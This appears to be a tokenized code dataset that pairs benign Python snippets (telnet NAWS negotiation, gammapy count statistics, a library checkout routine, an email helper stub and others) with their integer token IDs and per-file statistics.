25981, 74, 896, 13, 76, 29487, 18, 67, 1330, 12176, 274, 18, 35, 198, 6738, 1341, 35720, 1330, 40522, 198, 6738, 1341, 35720, 13, 12501, 296, 9150, 1330, 4217, 32, 198, 11748, 4818, 8079, 198, 6738, 629, 541, 88, 1330, 6737, 198, 11748, 2603, 29487, 8019, 13, 9078, 29487, 355, 458, 83, 198, 6738, 4818, 8079, 1330, 28805, 12514, 198, 6738, 1341, 35720, 1330, 14174, 62, 19849, 198, 6738, 1341, 35720, 13, 4164, 10466, 1330, 686, 66, 62, 14272, 62, 26675, 628, 198, 6738, 6101, 7535, 13, 13812, 1330, 3359, 11, 11532, 198, 11748, 14601, 198, 40539, 654, 13, 24455, 40539, 654, 10786, 46430, 11537, 628, 198, 6738, 1366, 62, 16801, 62, 26791, 13, 44374, 1330, 277, 22468, 198, 6738, 1366, 62, 16801, 62, 26791, 13, 44374, 1330, 318, 62, 7890, 14535, 198, 6738, 1366, 62, 16801, 62, 26791, 13, 44374, 1330, 277, 22468, 62, 4868, 198, 6738, 1366, 62, 16801, 62, 26791, 13, 44374, 1330, 4781, 62, 48101, 62, 2777, 2114, 628, 198, 6738, 4818, 8079, 1330, 3128, 11, 28805, 12514, 628, 628, 628, 628, 628, 628, 628, 628, 628, 628, 628, 628, 628, 628, 628, 628, 628, 628, 628 ]
3.459336
873
import json , requests , asyncio , logging logging.basicConfig(format='%(asctime)s - %(message)s', datefmt='%d-%b-%y %H:%M:%S')
[ 11748, 33918, 837, 7007, 837, 30351, 952, 837, 18931, 628, 198, 6404, 2667, 13, 35487, 16934, 7, 18982, 11639, 4, 7, 292, 310, 524, 8, 82, 532, 4064, 7, 20500, 8, 82, 3256, 3128, 69, 16762, 11639, 4, 67, 12, 4, 65, 12, 4, 88, 4064, 39, 25, 4, 44, 25, 4, 50, 11537, 220, 220, 198, 220, 220, 220, 220, 220, 220, 220, 220, 198, 220, 220, 220, 220, 198, 220, 220, 220, 220, 198 ]
1.986842
76
""" NAWS - Negotiate About Window Size This implements the NAWS telnet option as per https://www.ietf.org/rfc/rfc1073.txt NAWS allows telnet clients to report their current window size to the client and update it when the size changes """ from django.conf import settings from src.utils import utils NAWS = chr(31) IS = chr(0) # default taken from telnet specification DEFAULT_WIDTH = settings.CLIENT_DEFAULT_WIDTH DEFAULT_HEIGHT = settings.CLIENT_DEFAULT_HEIGHT # try to get the customized mssp info, if it exists. class Naws(object): """ Implements the MSSP protocol. Add this to a variable on the telnet protocol to set it up. """ def __init__(self, protocol): """ initialize NAWS by storing protocol on ourselves and calling the client to see if it supports NAWS. """ self.naws_step = 0 self.protocol = protocol self.protocol.protocol_flags['SCREENWIDTH'] = {0: DEFAULT_WIDTH} # windowID (0 is root):width self.protocol.protocol_flags['SCREENHEIGHT'] = {0: DEFAULT_HEIGHT} # windowID:width self.protocol.negotiationMap[NAWS] = self.negotiate_sizes self.protocol.do(NAWS).addCallbacks(self.do_naws, self.no_naws) def no_naws(self, option): """ This is the normal operation. """ self.protocol.handshake_done() def do_naws(self, option): """ Negotiate all the information. """ self.protocol.handshake_done()
[ 37811, 198, 198, 4535, 19416, 532, 13496, 5092, 378, 7994, 26580, 12849, 198, 198, 1212, 23986, 262, 11746, 19416, 13632, 3262, 3038, 355, 583, 198, 5450, 1378, 2503, 13, 1155, 69, 13, 2398, 14, 81, 16072, 14, 81, 16072, 940, 4790, 13, 14116, 198, 198, 4535, 19416, 3578, 13632, 3262, 7534, 284, 989, 511, 198, 14421, 4324, 2546, 284, 262, 5456, 290, 4296, 198, 270, 618, 262, 2546, 2458, 198, 198, 37811, 198, 6738, 42625, 14208, 13, 10414, 1330, 6460, 198, 6738, 12351, 13, 26791, 1330, 3384, 4487, 198, 198, 4535, 19416, 796, 442, 81, 7, 3132, 8, 198, 1797, 796, 442, 81, 7, 15, 8, 198, 2, 4277, 2077, 422, 13632, 3262, 20855, 198, 7206, 38865, 62, 54, 2389, 4221, 796, 6460, 13, 5097, 28495, 62, 7206, 38865, 62, 54, 2389, 4221, 198, 7206, 38865, 62, 13909, 9947, 796, 6460, 13, 5097, 28495, 62, 7206, 38865, 62, 13909, 9947, 198, 198, 2, 1949, 284, 651, 262, 27658, 285, 824, 79, 7508, 11, 611, 340, 7160, 13, 198, 198, 4871, 399, 8356, 7, 15252, 2599, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 1846, 1154, 902, 262, 6579, 4303, 8435, 13, 3060, 428, 284, 257, 198, 220, 220, 220, 7885, 319, 262, 13632, 3262, 8435, 284, 900, 340, 510, 13, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 825, 11593, 15003, 834, 7, 944, 11, 8435, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 41216, 11746, 19416, 416, 23069, 8435, 319, 6731, 198, 220, 220, 220, 220, 220, 220, 220, 290, 4585, 262, 5456, 284, 766, 611, 340, 6971, 198, 220, 220, 220, 220, 220, 220, 220, 11746, 19416, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 77, 8356, 62, 9662, 796, 657, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 11235, 4668, 796, 8435, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 11235, 4668, 13, 11235, 4668, 62, 33152, 17816, 6173, 2200, 1677, 54, 2389, 4221, 20520, 796, 1391, 15, 25, 5550, 38865, 62, 54, 2389, 4221, 92, 1303, 4324, 2389, 357, 15, 318, 6808, 2599, 10394, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 11235, 4668, 13, 11235, 4668, 62, 33152, 17816, 6173, 2200, 1677, 13909, 9947, 20520, 796, 1391, 15, 25, 5550, 38865, 62, 13909, 9947, 92, 1303, 4324, 2389, 25, 10394, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 11235, 4668, 13, 12480, 21236, 13912, 58, 4535, 19416, 60, 796, 2116, 13, 12480, 5092, 378, 62, 82, 4340, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 11235, 4668, 13, 4598, 7, 4535, 19416, 737, 2860, 14134, 10146, 7, 944, 13, 4598, 62, 77, 8356, 11, 2116, 13, 3919, 62, 77, 8356, 8, 628, 220, 220, 220, 825, 645, 62, 77, 8356, 7, 944, 11, 3038, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 770, 318, 262, 3487, 4905, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 11235, 4668, 13, 4993, 32431, 62, 28060, 3419, 628, 220, 220, 220, 825, 466, 62, 77, 8356, 7, 944, 11, 3038, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 13496, 5092, 378, 477, 262, 1321, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 11235, 4668, 13, 4993, 32431, 62, 28060, 3419, 628 ]
2.498333
600
# _*_ encoding:utf-8 _*_ from __future__ import unicode_literals from datetime import datetime # from DjangoUeditor.models import UEditorField from django.db import models from organization.models import DramaOrg, Author
[ 2, 4808, 9, 62, 21004, 25, 40477, 12, 23, 4808, 9, 62, 198, 6738, 11593, 37443, 834, 1330, 28000, 1098, 62, 17201, 874, 198, 6738, 4818, 8079, 1330, 4818, 8079, 198, 198, 2, 422, 37770, 52, 35352, 13, 27530, 1330, 471, 17171, 15878, 198, 198, 6738, 42625, 14208, 13, 9945, 1330, 4981, 198, 6738, 4009, 13, 27530, 1330, 30647, 46808, 11, 6434, 628, 628, 628 ]
3.507692
65
""" This file handles the checkout of books, with log entry added """ import database as db # member_id is a 4-digit numebr and checkout_list is a list containing the full detail of the book being checked out def go(checkout_list = [], member_id = "0"): """ This function takes in a list of books and a member id, then modify the database.txt file so that these books are borrowed by this member """ # since only the available books can be add to the checkout_list, there is no need to check again for target_book in checkout_list: result = db.modify_member_id(target_book[0], member_id) # check if this checkout is succeed if result == 0: # add log entry # target_book[0] is book id db.checkout_log(target_book[0]) # stop checkout process and report back (highly unlikely) return result return 0 # test code if __name__ == "__main__": # go([ # [['32_0', '"La crise europeene et la premiere guerre mondiale"', 'Pierre Renouvin.', '1/5/2015', '0'], # ['21_0', '"Institutions of economic growth"', 'J.P.Powelson', '30/3/2015', '0'], # ]) pass
[ 37811, 198, 1212, 2393, 17105, 262, 28006, 286, 3835, 11, 351, 2604, 5726, 2087, 198, 37811, 198, 198, 11748, 6831, 355, 20613, 198, 198, 2, 2888, 62, 312, 318, 257, 604, 12, 27003, 997, 68, 1671, 290, 28006, 62, 4868, 318, 257, 1351, 7268, 262, 1336, 3703, 286, 262, 1492, 852, 10667, 503, 198, 4299, 467, 7, 9122, 448, 62, 4868, 796, 685, 4357, 2888, 62, 312, 796, 366, 15, 1, 2599, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 770, 2163, 2753, 287, 257, 1351, 286, 3835, 290, 257, 2888, 4686, 11, 220, 198, 220, 220, 220, 788, 13096, 262, 6831, 13, 14116, 2393, 523, 326, 777, 3835, 389, 22546, 198, 220, 220, 220, 416, 428, 2888, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 1303, 1201, 691, 262, 1695, 3835, 460, 307, 751, 284, 262, 28006, 62, 4868, 11, 612, 318, 645, 761, 284, 2198, 757, 198, 220, 220, 220, 329, 2496, 62, 2070, 287, 28006, 62, 4868, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 198, 220, 220, 220, 220, 220, 220, 220, 1255, 796, 20613, 13, 4666, 1958, 62, 19522, 62, 312, 7, 16793, 62, 2070, 58, 15, 4357, 2888, 62, 312, 8, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 2198, 611, 428, 28006, 318, 6758, 198, 220, 220, 220, 220, 220, 220, 220, 611, 1255, 6624, 657, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 751, 2604, 5726, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 2496, 62, 2070, 58, 15, 60, 318, 1492, 4686, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 20613, 13, 9122, 448, 62, 6404, 7, 16793, 62, 2070, 58, 15, 12962, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 2245, 28006, 1429, 290, 989, 736, 357, 47444, 7485, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 1255, 198, 220, 220, 220, 1441, 657, 198, 198, 2, 1332, 2438, 198, 361, 11593, 3672, 834, 6624, 366, 834, 12417, 834, 1298, 198, 220, 220, 220, 1303, 467, 26933, 198, 220, 220, 220, 1303, 220, 220, 220, 220, 16410, 6, 2624, 62, 15, 3256, 705, 1, 14772, 1067, 786, 11063, 431, 1734, 2123, 8591, 19245, 915, 263, 260, 285, 623, 498, 68, 1, 3256, 705, 36910, 7152, 280, 7114, 2637, 11, 705, 16, 14, 20, 14, 4626, 3256, 705, 15, 6, 4357, 220, 198, 220, 220, 220, 1303, 220, 220, 220, 220, 37250, 2481, 62, 15, 3256, 705, 1, 6310, 270, 3508, 286, 3034, 3349, 1, 3256, 705, 41, 13, 47, 13, 47, 322, 10151, 3256, 705, 1270, 14, 18, 14, 4626, 3256, 705, 15, 6, 4357, 220, 198, 220, 220, 220, 1303, 33761, 198, 220, 220, 220, 1208 ]
2.561966
468
import os from targets.base_target import Target from targets.data_target import DataTarget from targets.dir_target import DirTarget from targets.errors import ( FileAlreadyExists, FileSystemException, MissingParentDirectory, NotADirectory, ) from targets.file_target import FileSystemTarget, FileTarget from targets.fs.file_system import FileSystem from targets.fs.local import LocalFileSystem from targets.inmemory_target import InMemoryTarget from targets.target_factory import target from targets.utils.atomic import AtomicLocalFile
[ 11748, 28686, 198, 198, 6738, 6670, 13, 8692, 62, 16793, 1330, 12744, 198, 6738, 6670, 13, 7890, 62, 16793, 1330, 6060, 21745, 198, 6738, 6670, 13, 15908, 62, 16793, 1330, 36202, 21745, 198, 6738, 6670, 13, 48277, 1330, 357, 198, 220, 220, 220, 9220, 37447, 3109, 1023, 11, 198, 220, 220, 220, 9220, 11964, 16922, 11, 198, 220, 220, 220, 25639, 24546, 43055, 11, 198, 220, 220, 220, 1892, 2885, 1060, 652, 11, 198, 8, 198, 6738, 6670, 13, 7753, 62, 16793, 1330, 9220, 11964, 21745, 11, 9220, 21745, 198, 6738, 6670, 13, 9501, 13, 7753, 62, 10057, 1330, 9220, 11964, 198, 6738, 6670, 13, 9501, 13, 12001, 1330, 10714, 8979, 11964, 198, 6738, 6670, 13, 259, 31673, 62, 16793, 1330, 554, 30871, 21745, 198, 6738, 6670, 13, 16793, 62, 69, 9548, 1330, 2496, 198, 6738, 6670, 13, 26791, 13, 47116, 1330, 28976, 14565, 8979, 198 ]
3.794521
146
# Licensed under a 3-clause BSD style license - see LICENSE.rst import abc import numpy as np from scipy.stats import chi2 from gammapy.utils.roots import find_roots from .fit_statistics import cash, wstat __all__ = ["WStatCountsStatistic", "CashCountsStatistic"] class CashCountsStatistic(CountsStatistic): """Class to compute statistics (significance, asymmetric errors , ul) for Poisson distributed variable with known background. Parameters ---------- n_on : int Measured counts mu_bkg : float Known level of background """ @property def n_bkg(self): """Expected background counts""" return self.mu_bkg @property def n_sig(self): """Excess""" return self.n_on - self.n_bkg @property def error(self): """Approximate error from the covariance matrix.""" return np.sqrt(self.n_on) @property def stat_null(self): """Stat value for null hypothesis, i.e. 0 expected signal counts""" return cash(self.n_on, self.mu_bkg + 0) @property def stat_max(self): """Stat value for best fit hypothesis, i.e. expected signal mu = n_on - mu_bkg""" return cash(self.n_on, self.n_on) class WStatCountsStatistic(CountsStatistic): """Class to compute statistics (significance, asymmetric errors , ul) for Poisson distributed variable with unknown background. Parameters ---------- n_on : int Measured counts in on region n_off : int Measured counts in off region alpha : float Acceptance ratio of on and off measurements mu_sig : float Expected signal counts in on region """ @property def n_bkg(self): """Known background computed alpha * n_off""" return self.alpha * self.n_off @property def n_sig(self): """Excess""" return self.n_on - self.n_bkg - self.mu_sig @property def error(self): """Approximate error from the covariance matrix.""" return np.sqrt(self.n_on + self.alpha ** 2 * self.n_off) @property def stat_null(self): """Stat value for null hypothesis, i.e. mu_sig expected signal counts""" return wstat(self.n_on, self.n_off, self.alpha, self.mu_sig) @property def stat_max(self): """Stat value for best fit hypothesis, i.e. expected signal mu = n_on - alpha * n_off - mu_sig""" return wstat(self.n_on, self.n_off, self.alpha, self.n_sig + self.mu_sig)
[ 2, 49962, 739, 257, 513, 12, 565, 682, 347, 10305, 3918, 5964, 532, 766, 38559, 24290, 13, 81, 301, 198, 11748, 450, 66, 198, 11748, 299, 32152, 355, 45941, 198, 6738, 629, 541, 88, 13, 34242, 1330, 33166, 17, 198, 6738, 308, 6475, 12826, 13, 26791, 13, 19150, 1330, 1064, 62, 19150, 198, 6738, 764, 11147, 62, 14269, 3969, 1330, 5003, 11, 266, 14269, 198, 198, 834, 439, 834, 796, 14631, 54, 17126, 12332, 82, 17126, 2569, 1600, 366, 35361, 12332, 82, 17126, 2569, 8973, 628, 198, 198, 4871, 16210, 12332, 82, 17126, 2569, 7, 12332, 82, 17126, 2569, 2599, 198, 220, 220, 220, 37227, 9487, 284, 24061, 7869, 357, 12683, 811, 590, 11, 30372, 19482, 8563, 837, 14856, 8, 329, 7695, 30927, 9387, 7885, 198, 220, 220, 220, 351, 1900, 4469, 13, 628, 220, 220, 220, 40117, 198, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 299, 62, 261, 1058, 493, 198, 220, 220, 220, 220, 220, 220, 220, 2185, 34006, 9853, 198, 220, 220, 220, 38779, 62, 65, 10025, 1058, 12178, 198, 220, 220, 220, 220, 220, 220, 220, 29454, 1241, 286, 4469, 198, 220, 220, 220, 37227, 628, 220, 220, 220, 2488, 26745, 198, 220, 220, 220, 825, 299, 62, 65, 10025, 7, 944, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 3109, 7254, 4469, 9853, 37811, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 2116, 13, 30300, 62, 65, 10025, 628, 220, 220, 220, 2488, 26745, 198, 220, 220, 220, 825, 299, 62, 82, 328, 7, 944, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 3109, 919, 37811, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 2116, 13, 77, 62, 261, 532, 2116, 13, 77, 62, 65, 10025, 628, 220, 220, 220, 2488, 26745, 198, 220, 220, 220, 825, 4049, 7, 944, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 4677, 13907, 1920, 4049, 422, 262, 44829, 590, 17593, 526, 15931, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 45941, 13, 31166, 17034, 7, 944, 13, 77, 62, 261, 8, 628, 220, 220, 220, 2488, 26745, 198, 220, 220, 220, 825, 1185, 62, 8423, 7, 944, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 17126, 1988, 329, 9242, 14078, 11, 1312, 13, 68, 13, 657, 2938, 6737, 9853, 37811, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 5003, 7, 944, 13, 77, 62, 261, 11, 2116, 13, 30300, 62, 65, 10025, 1343, 657, 8, 628, 220, 220, 220, 2488, 26745, 198, 220, 220, 220, 825, 1185, 62, 9806, 7, 944, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 17126, 1988, 329, 1266, 4197, 14078, 11, 1312, 13, 68, 13, 2938, 6737, 38779, 796, 299, 62, 261, 532, 38779, 62, 65, 10025, 37811, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 5003, 7, 944, 13, 77, 62, 261, 11, 2116, 13, 77, 62, 261, 8, 628, 198, 4871, 370, 17126, 12332, 82, 17126, 2569, 7, 12332, 82, 17126, 2569, 2599, 198, 220, 220, 220, 37227, 9487, 284, 24061, 7869, 357, 12683, 811, 590, 11, 30372, 19482, 8563, 837, 14856, 8, 329, 7695, 30927, 9387, 7885, 198, 220, 220, 220, 351, 6439, 4469, 13, 628, 220, 220, 220, 40117, 198, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 299, 62, 261, 1058, 493, 198, 220, 220, 220, 220, 220, 220, 220, 2185, 34006, 9853, 287, 319, 3814, 198, 220, 220, 220, 299, 62, 2364, 1058, 493, 198, 220, 220, 220, 220, 220, 220, 220, 2185, 34006, 9853, 287, 572, 3814, 198, 220, 220, 220, 17130, 1058, 12178, 198, 220, 220, 220, 220, 220, 220, 220, 21699, 590, 8064, 286, 319, 290, 572, 13871, 198, 220, 220, 220, 38779, 62, 82, 328, 1058, 12178, 198, 220, 220, 220, 220, 220, 220, 220, 1475, 7254, 6737, 9853, 287, 319, 3814, 198, 220, 220, 220, 37227, 628, 220, 220, 220, 2488, 26745, 198, 220, 220, 220, 825, 299, 62, 65, 10025, 7, 944, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 29870, 4469, 29231, 17130, 1635, 299, 62, 2364, 37811, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 2116, 13, 26591, 1635, 2116, 13, 77, 62, 2364, 628, 220, 220, 220, 2488, 26745, 198, 220, 220, 220, 825, 299, 62, 82, 328, 7, 944, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 3109, 919, 37811, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 2116, 13, 77, 62, 261, 532, 2116, 13, 77, 62, 65, 10025, 532, 2116, 13, 30300, 62, 82, 328, 628, 220, 220, 220, 2488, 26745, 198, 220, 220, 220, 825, 4049, 7, 944, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 4677, 13907, 1920, 4049, 422, 262, 44829, 590, 17593, 526, 15931, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 45941, 13, 31166, 17034, 7, 944, 13, 77, 62, 261, 1343, 2116, 13, 26591, 12429, 362, 1635, 2116, 13, 77, 62, 2364, 8, 628, 220, 220, 220, 2488, 26745, 198, 220, 220, 220, 825, 1185, 62, 8423, 7, 944, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 17126, 1988, 329, 9242, 14078, 11, 1312, 13, 68, 13, 38779, 62, 82, 328, 2938, 6737, 9853, 37811, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 266, 14269, 7, 944, 13, 77, 62, 261, 11, 2116, 13, 77, 62, 2364, 11, 2116, 13, 26591, 11, 2116, 13, 30300, 62, 82, 328, 8, 628, 220, 220, 220, 2488, 26745, 198, 220, 220, 220, 825, 1185, 62, 9806, 7, 944, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 17126, 1988, 329, 1266, 4197, 14078, 11, 1312, 13, 68, 13, 2938, 6737, 38779, 796, 299, 62, 261, 532, 17130, 1635, 299, 62, 2364, 532, 38779, 62, 82, 328, 37811, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 266, 14269, 7, 944, 13, 77, 62, 261, 11, 2116, 13, 77, 62, 2364, 11, 2116, 13, 26591, 11, 2116, 13, 77, 62, 82, 328, 1343, 2116, 13, 30300, 62, 82, 328, 8, 198 ]
2.520521
999
# NAME # # C_mail # # DESCRIPTION # # 'C_mail' is a simple class for handling/abstracting common # email related activities. # # Once setup with address lists, and/or subject text # it sends body text and inline attachments. # # HISTORY # # 11 January 2007 # o Initial development implementation. # # System imports import os import os.path import sys import string import datetime import smtplib from cgi import * from email.MIMEImage import MIMEImage from email.MIMEText import MIMEText from email.MIMEMultipart import MIMEMultipart # 3rd party imports #from configobj import ConfigObj # SCIN imports #from _common.systemMisc import * #import systemMisc
[ 2, 36751, 198, 2, 198, 2, 197, 34, 62, 4529, 198, 2, 198, 2, 22196, 40165, 198, 2, 198, 2, 197, 6, 34, 62, 4529, 6, 318, 257, 2829, 1398, 329, 9041, 14, 397, 8709, 278, 2219, 198, 2, 197, 12888, 3519, 4568, 13, 198, 2, 198, 2, 197, 7454, 9058, 351, 2209, 8341, 11, 290, 14, 273, 2426, 2420, 198, 2, 197, 270, 12800, 1767, 2420, 290, 26098, 32161, 13, 198, 2, 198, 2, 367, 42480, 198, 2, 198, 2, 1367, 3269, 4343, 198, 2, 267, 20768, 2478, 7822, 13, 198, 2, 198, 198, 2, 4482, 17944, 198, 11748, 220, 197, 418, 198, 11748, 220, 197, 418, 13, 6978, 198, 11748, 220, 197, 17597, 198, 11748, 197, 8841, 198, 11748, 197, 19608, 8079, 198, 11748, 197, 5796, 83, 489, 571, 198, 6738, 220, 197, 37157, 220, 197, 197, 197, 11748, 220, 197, 9, 198, 6738, 220, 197, 12888, 13, 44, 12789, 5159, 220, 197, 11748, 220, 197, 44, 12789, 5159, 198, 6738, 197, 12888, 13, 44, 3955, 2767, 2302, 197, 197, 11748, 197, 44, 3955, 2767, 2302, 198, 6738, 220, 197, 12888, 13, 44, 3955, 3620, 586, 541, 433, 220, 197, 11748, 220, 197, 44, 3955, 3620, 586, 541, 433, 198, 198, 2, 513, 4372, 2151, 17944, 198, 2, 6738, 220, 197, 11250, 26801, 220, 197, 197, 11748, 220, 197, 16934, 49201, 198, 198, 2, 6374, 1268, 17944, 198, 2, 6738, 4808, 11321, 13, 10057, 44, 2304, 1330, 1635, 198, 2, 11748, 197, 10057, 44, 2304, 198, 197, 220, 220, 220, 220, 220, 220, 220, 220, 197, 197, 220, 220, 198, 197, 220, 220, 220, 220, 197, 197, 628, 197, 220, 220, 220, 220, 198 ]
2.561594
276
# -*- coding: utf-8 -*- import glob from importlib import import_module import os from os import path as op from mne.utils import _replace_md5, ArgvSetter # Header markings go: # 1. =/= : Page title # 2. = : Command name # 3. -/- : Command description # 4. - : Command sections (Examples, Notes) header = """\ :orphan: .. _python_commands: =============================== Command line tools using Python =============================== .. contents:: Page contents :local: :depth: 1 """ command_rst = """ .. _{0}: {0} {1} .. rst-class:: callout {2} """ # This is useful for testing/iterating to see what the result looks like if __name__ == '__main__': generate_commands_rst()
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 11748, 15095, 198, 6738, 1330, 8019, 1330, 1330, 62, 21412, 198, 11748, 28686, 198, 6738, 28686, 1330, 3108, 355, 1034, 198, 198, 6738, 285, 710, 13, 26791, 1330, 4808, 33491, 62, 9132, 20, 11, 20559, 85, 7248, 353, 628, 628, 198, 2, 48900, 30390, 467, 25, 198, 2, 352, 13, 796, 14, 28, 1058, 7873, 3670, 198, 2, 362, 13, 796, 220, 220, 1058, 9455, 1438, 198, 2, 513, 13, 532, 16327, 1058, 9455, 6764, 198, 2, 604, 13, 532, 220, 220, 1058, 9455, 9004, 357, 27730, 11, 11822, 8, 198, 198, 25677, 796, 37227, 59, 198, 25, 13425, 272, 25, 198, 198, 492, 4808, 29412, 62, 9503, 1746, 25, 198, 198, 4770, 25609, 18604, 198, 21575, 1627, 4899, 1262, 11361, 198, 4770, 25609, 18604, 198, 198, 492, 10154, 3712, 7873, 10154, 198, 220, 220, 1058, 12001, 25, 198, 220, 220, 1058, 18053, 25, 352, 198, 198, 37811, 198, 198, 21812, 62, 81, 301, 796, 37227, 198, 198, 492, 4808, 90, 15, 38362, 198, 198, 90, 15, 92, 198, 90, 16, 92, 198, 198, 492, 374, 301, 12, 4871, 3712, 869, 448, 198, 198, 90, 17, 92, 198, 198, 37811, 628, 198, 198, 2, 770, 318, 4465, 329, 4856, 14, 2676, 803, 284, 766, 644, 262, 1255, 3073, 588, 198, 361, 11593, 3672, 834, 6624, 705, 834, 12417, 834, 10354, 198, 220, 220, 220, 7716, 62, 9503, 1746, 62, 81, 301, 3419, 198 ]
2.862903
248
# -*- coding: utf-8 -*- """ Created on Sat Jan 22 15:31:32 2022 @author: Akshatha """ if __name__ == '__main__': my_stack = Stack() my_stack.push(5) my_stack.disp() my_stack.push(10) my_stack.disp() my_stack.push('game') my_stack.disp() print('stack length: ',my_stack.length()) print('popped element: ',my_stack.pop()) my_stack.disp() print('stack length: ',my_stack.length())
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 201, 198, 37811, 201, 198, 41972, 319, 7031, 2365, 2534, 1315, 25, 3132, 25, 2624, 33160, 201, 198, 201, 198, 31, 9800, 25, 317, 50133, 30921, 201, 198, 37811, 201, 198, 220, 220, 220, 220, 201, 198, 361, 11593, 3672, 834, 6624, 705, 834, 12417, 834, 10354, 201, 198, 220, 220, 220, 616, 62, 25558, 796, 23881, 3419, 201, 198, 220, 220, 220, 616, 62, 25558, 13, 14689, 7, 20, 8, 201, 198, 220, 220, 220, 616, 62, 25558, 13, 6381, 79, 3419, 201, 198, 220, 220, 220, 616, 62, 25558, 13, 14689, 7, 940, 8, 201, 198, 220, 220, 220, 616, 62, 25558, 13, 6381, 79, 3419, 201, 198, 220, 220, 220, 616, 62, 25558, 13, 14689, 10786, 6057, 11537, 201, 198, 220, 220, 220, 616, 62, 25558, 13, 6381, 79, 3419, 201, 198, 220, 220, 220, 3601, 10786, 25558, 4129, 25, 46083, 1820, 62, 25558, 13, 13664, 28955, 201, 198, 220, 220, 220, 3601, 10786, 7501, 1496, 5002, 25, 46083, 1820, 62, 25558, 13, 12924, 28955, 201, 198, 220, 220, 220, 616, 62, 25558, 13, 6381, 79, 3419, 201, 198, 220, 220, 220, 3601, 10786, 25558, 4129, 25, 46083, 1820, 62, 25558, 13, 13664, 28955 ]
2.119048
210
# coding=utf-8 # Copyright 2014 Pants project contributors (see CONTRIBUTORS.md). # Licensed under the Apache License, Version 2.0 (see LICENSE). from __future__ import (absolute_import, division, generators, nested_scopes, print_function, unicode_literals, with_statement) import subprocess from contextlib import contextmanager @contextmanager def preserve_stty_settings(): """Run potentially stty-modifying operations, e.g., REPL execution, in this contextmanager.""" stty_settings = STTYSettings() stty_settings.save_stty_options() yield stty_settings.restore_ssty_options() class STTYSettings(object): """Saves/restores stty settings, e.g., during REPL execution."""
[ 2, 19617, 28, 40477, 12, 23, 198, 2, 15069, 1946, 41689, 1628, 20420, 357, 3826, 27342, 9865, 3843, 20673, 13, 9132, 737, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 3826, 38559, 24290, 737, 198, 198, 6738, 11593, 37443, 834, 1330, 357, 48546, 62, 11748, 11, 7297, 11, 27298, 11, 28376, 62, 1416, 13920, 11, 3601, 62, 8818, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 28000, 1098, 62, 17201, 874, 11, 351, 62, 26090, 8, 198, 198, 11748, 850, 14681, 198, 6738, 4732, 8019, 1330, 4732, 37153, 628, 198, 31, 22866, 37153, 198, 4299, 12201, 62, 301, 774, 62, 33692, 33529, 198, 220, 37227, 10987, 6196, 336, 774, 12, 4666, 4035, 4560, 11, 304, 13, 70, 1539, 45285, 9706, 11, 287, 428, 4732, 37153, 526, 15931, 198, 220, 336, 774, 62, 33692, 796, 3563, 9936, 26232, 3419, 198, 220, 336, 774, 62, 33692, 13, 21928, 62, 301, 774, 62, 25811, 3419, 198, 220, 7800, 198, 220, 336, 774, 62, 33692, 13, 2118, 382, 62, 82, 34365, 62, 25811, 3419, 628, 198, 4871, 3563, 9936, 26232, 7, 15252, 2599, 198, 220, 37227, 50, 3080, 14, 2118, 2850, 336, 774, 6460, 11, 304, 13, 70, 1539, 1141, 45285, 9706, 526, 15931, 198 ]
3.201794
223
